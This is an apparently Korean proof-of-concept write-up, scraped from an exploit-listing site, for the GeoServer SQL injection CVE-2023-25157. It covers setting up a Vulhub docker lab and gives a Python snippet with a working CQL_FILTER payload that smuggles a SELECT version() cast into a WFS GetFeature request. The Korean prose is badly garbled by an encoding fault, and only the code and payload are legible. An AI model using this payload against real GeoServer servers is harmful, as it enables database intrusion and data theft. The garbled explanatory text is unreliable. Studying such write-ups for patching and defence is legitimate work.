Share 
## https://sploitus.com/exploit?id=2B14A662-EE2B-513F-BF2C-1D7871AA9CB4
��# geoserver CVE-2023-25157

> T�tǸ҇� 30� [30�] @�Ȱ�

---

github ��l� - https://github.com/custiya/geoserver-CVE-2023-25157



### ��}�� ��}�

* CVE-2023-25157�� GeoServer|��� $�Ռ��� ��ij p�t�0� �D��� �� `�լ��t�X��� �t� ���\� SQLi ��}��

* GeoServer 2.22.0 t�X�X� |ǀ� ������ ���

* WFS(Web Feature Service) �ƭ�X� CQL_FILTER|��� �|���0�� ��}�h�

* xǝ���t� t��� API�� ��� ���X��t� �l�� tǩ� ���



### Xֽ� l�1�

* docker compose up -d ���ܴ\� LѤ¸� Xֽ� �‰�

* http://your-ip:8080/geoserver \� ��t����� ȍ� ���

* <�� PostGIS p�t�0� ȥnj�� ��h�� 0�t� ���� ������t�|� h�

* VulhubX� GeoServer xǤ�4Ѥ��Ŕ� t��� PostGIS p�t�0� ȥnj�� tȬ�

    * ���� ��� tDŽ� : vulhub

    * p�t�0� ȥnj� tDŽ� : pg

    * L�t�� tDŽ� : example

    * ����\� ��1� : name



### poc.py

* ���� � ˆ�X� ����D� 0��<�\� sqli l�8�D� ̹� ���

* t��� l�8�D� request��ȴD� ����X��� ����� ��

* strStartsWith(name,'x'') = true

    * x ��X� '|� X՘� T� ���X�p� sql 8��� �4�

* and 1=(SELECT CAST ((SELECT version()) AS integer))

    * version() h�”� PostgreSQLX� ֬� ���D� �X�XՔ� h��t�p�, 8�����

    * CAST(... AS integer)�� ��\� ��\� ��X�X���\� $�X�� ���

    * ����� ��� T�����|� �X�XՌ� ���, Blind SQL Injection LѤ¸�� ���

```

# ��� URL

url = "http://localhost:8080/geoserver/ows"



# CQL_FILTER�� 䴴�� ���� x��X� 8����� (URL �T�)�� ����)

cql_filter = "strStartsWith(name,'x'') = true and 1=(SELECT CAST ((SELECT version()) AS integer)) -- ') = true"



# �|���0� $��

params = {

    "service": "wfs",

    "version": "1.0.0",

    "request": "GetFeature",

    "typeName": "vulhub:example",

    "CQL_FILTER": cql_filter

}

```

### ����

![Alt text](result.png)



### Ȭ�

* t��� poc|� ��t� SQLiX� ��� �ŀ�|� L�D� �� � �����. �����ǔ� SQL �Ϭ�|� ��X��� �¤�\� ����D� ���`� � ��D� �� ��.

* t��� ����D� ɹ0� �X���, ���Ɛ� ��%�� ����t� DՔ�t� ������|� \��. �\� ��%� �@� SQL l�8�D� �\� ����t�� ����XՔ� ��t� D�Ȳ|� ļij\� ȥ�X��� ����X���|� \��.